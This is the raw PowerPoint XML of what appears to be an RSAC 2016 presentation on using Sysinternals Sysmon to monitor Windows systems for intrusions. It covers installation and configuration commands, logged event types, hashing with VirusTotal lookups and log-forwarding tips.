            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Filter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>noise, especially uninteresting image loads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Test overhead on mission-critical systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make sure event log is large enough to capture desired time window</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Forward events off box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To prevent deletion by attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For analyzing aggregate network behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For tracing activity between systems (e.g. pass-the-hash)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85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41" y="1066259"/>
            <a:ext cx="4974992" cy="38714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Sysmon can give you deep insights into intrusions and infections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Send cases, tips and feature requests to me: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mark.russinovich@microsoft.com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85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>markrussinovich</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="85258B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sysmon and other Sysinternals tools  are documented in the upcoming “Troubleshooting with the Sysinternals Tools”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33" y="509331"/>
            <a:ext cx="3392798" cy="415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970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lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sysmon Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Architecture and Advanced Filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System Forensics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Sysmon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826000"/>
            <a:ext cx="1052513" cy="274638"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F56C8676-1494-424A-9EE1-69F4EB666BA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3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Sysmon Command-Line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40" y="1066259"/>
            <a:ext cx="8423385" cy="387030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Installation:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysmon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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accepteula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Extracts binaries into %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>systemroot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Registers event log manifest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enables default configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Viewing and updating configuration:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -c [options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Updates take effect immediately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Options can be basic options or a configuration file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Register event manifest for viewing logs only:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysmon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-m</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Uninstall:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -u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332" y="1864958"/>
            <a:ext cx="5099044" cy="87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56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Sysmon Events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21327"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2287062" y="1091994"/>
          <a:ext cx="4619134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2632">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3336777415"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1196502">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2308466596"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="244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Category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Event</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> ID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896860"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2980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Process</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Create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957198"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2980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Process Terminated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9124"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2980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Driver Loaded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1879"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2980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Image Loaded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46086"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2980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File Creation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Time Changed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05441"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2980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Connection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90676"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="29805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CreateRemoteThread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629"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="29805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RawAccessRead</a:t>
                      </a:r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53145"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2980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Sysmon Service</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> State Change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584929"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2980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Error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33355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8501" y="4799919"/>
            <a:ext cx="2189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5258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*Contributed by David Magnotti</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="8525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737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Configuration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with no options logs all the following with SHA1 hashes where applicable:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301752" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rocess create, Process terminate, Driver loaded, File creation time changed, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RawAccessRead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CreateRemoteThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Sysmon service state changed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Additional basic options: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30219"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="600074" y="3176340"/>
          <a:ext cx="83915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376">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="289520419"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3867149">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2526541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7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-h [SHA1] [MD5] [SHA256] [IMPHASH] [*]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r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> algorithm(s)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54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-n [process,…]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Logs network events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42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-l [process,…]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Logs image load events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65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Restores default configuration (-c only)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16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258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Hashes and VirusTotal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extract a hash and paste it into VT search for a report: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8676-1494-424A-9EE1-69F4EB666BA8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23" y="1542563"/>
            <a:ext cx="5799902" cy="26499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6680" y="3465759"/>
            <a:ext cx="2167805" cy="284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070" y="1656376"/>
            <a:ext cx="5078623" cy="305634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53650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SAC 2016 brand colors 1">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="82258B"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="0066CC"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="82258B"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FFC800"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="F12332"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="8CBE40"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="D86521"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="78C0EB"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="002999"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="8225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F61D0217-9C77-4623-93BF-EDD41C19CCDA}" vid="{29E6FCBD-3B55-4129-8314-7AEEF3B55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3CC5F317056D4A95C31D0845643DDB" ma:contentTypeVersion="3" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="07969480cf172942e0e6c39aa227e143">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="d2f18272-e417-4642-a5b3-14b5d5bf62ce" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="b1ba70d31095cadaa5792bee4ec2cb04" ns2:_="">
    <xsd:import namespace="d2f18272-e417-4642-a5b3-14b5d5bf62c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f18272-e417-4642-a5b3-14b5d5bf62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2f18272-e417-4642-a5b3-14b5d5bf62ce">
      <UserInfo>
        <DisplayName>John Lambert (MSTIC)</DisplayName>
        <AccountId>3496</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Malcolm Davis</DisplayName>
        <AccountId>3497</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>David Ladd</DisplayName>
        <AccountId>3498</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Dan Mace</DisplayName>
        <AccountId>3499</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Alex Weinert</DisplayName>
        <AccountId>3500</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Craig Wittenberg</DisplayName>
        <AccountId>1005</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Yogesh Roy</DisplayName>
        <AccountId>2293</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Ram Shankar Siva Kumar</DisplayName>
        <AccountId>3495</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Vinod Nair</DisplayName>
        <AccountId>3692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9582276-AED7-44DE-B5E8-3E327CC8C7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f18272-e417-4642-a5b3-14b5d5bf62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C6C456-C70D-45E4-A609-6B8DF86A69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4D2958-8A03-4EF3-A11E-21FEECEB11E8}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="d2f18272-e417-4642-a5b3-14b5d5bf62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RSAC 2016 Presentation Guidelines</Template>
  <TotalTime>5100</TotalTime>
  <Words>1647</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>435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Courier New</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Tracking Hackers on Your Network with Sysinternals Sysmon</vt:lpstr>
      <vt:lpstr>Windows Forensic Monitoring Limitations</vt:lpstr>
      <vt:lpstr>Sysinternals Sysmon (System Monitor)</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Sysmon Overview</vt:lpstr>
      <vt:lpstr>Sysmon Command-Line Usage</vt:lpstr>
      <vt:lpstr>Sysmon Events</vt:lpstr>
      <vt:lpstr>Basic Configuration Options</vt:lpstr>
      <vt:lpstr>Hashes and VirusTotal</vt:lpstr>
      <vt:lpstr>Advanced Configuration</vt:lpstr>
      <vt:lpstr>Configuration File Schema </vt:lpstr>
      <vt:lpstr>Event Tags</vt:lpstr>
      <vt:lpstr>Event Tags With No Filters</vt:lpstr>
      <vt:lpstr>Architecture and Advanced Filtering</vt:lpstr>
      <vt:lpstr>Sysmon Architecture</vt:lpstr>
      <vt:lpstr>Advanced Filtering</vt:lpstr>
      <vt:lpstr>Process Events</vt:lpstr>
      <vt:lpstr>Image and Driver Loaded</vt:lpstr>
      <vt:lpstr>File Events</vt:lpstr>
      <vt:lpstr>Network Events</vt:lpstr>
      <vt:lpstr>Thread Events</vt:lpstr>
      <vt:lpstr>Disk/Volume Read Events</vt:lpstr>
      <vt:lpstr>Filter Examples</vt:lpstr>
      <vt:lpstr>System Forensics:  The Case of the Unwanted Software,   SONAR</vt:lpstr>
      <vt:lpstr>The Case of My Mom’s Chronically Infected PC</vt:lpstr>
      <vt:lpstr>The Case of My Mom’s Chronically Infected PC</vt:lpstr>
      <vt:lpstr>The Case of My Mom’s Chronically Infected PC</vt:lpstr>
      <vt:lpstr>The Case of My Mom’s Chronically Infected PC</vt:lpstr>
      <vt:lpstr>The Case of My Mom’s Chronically Infected PC</vt:lpstr>
      <vt:lpstr>The Case of My Mom’s Chronically Infected PC</vt:lpstr>
      <vt:lpstr>The Case of My Mom’s Chronically Infected PC: Solved</vt:lpstr>
      <vt:lpstr>SONAR</vt:lpstr>
      <vt:lpstr>Network-Wide Monitoring:  Splunk,  Microsoft Operations Management Suite</vt:lpstr>
      <vt:lpstr>Splunk</vt:lpstr>
      <vt:lpstr>Splunk Example Queries</vt:lpstr>
      <vt:lpstr>Operations Management Suite</vt:lpstr>
      <vt:lpstr>Best Practices and Tips</vt:lpstr>
      <vt:lpstr>Best Practices and Tips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 for Preparing Your Conference Presentation</dc:title>
  <dc:creator>Tara Jung</dc:creator>
  <cp:lastModifiedBy>Mark Russinovich</cp:lastModifiedBy>
  <cp:revision>246</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-11-18T15:16:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-03-02T22:46:41Z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0x010100BA3CC5F317056D4A95C31D0845643DDB</vt:lpwstr>
  </property>
</Properties>
</file>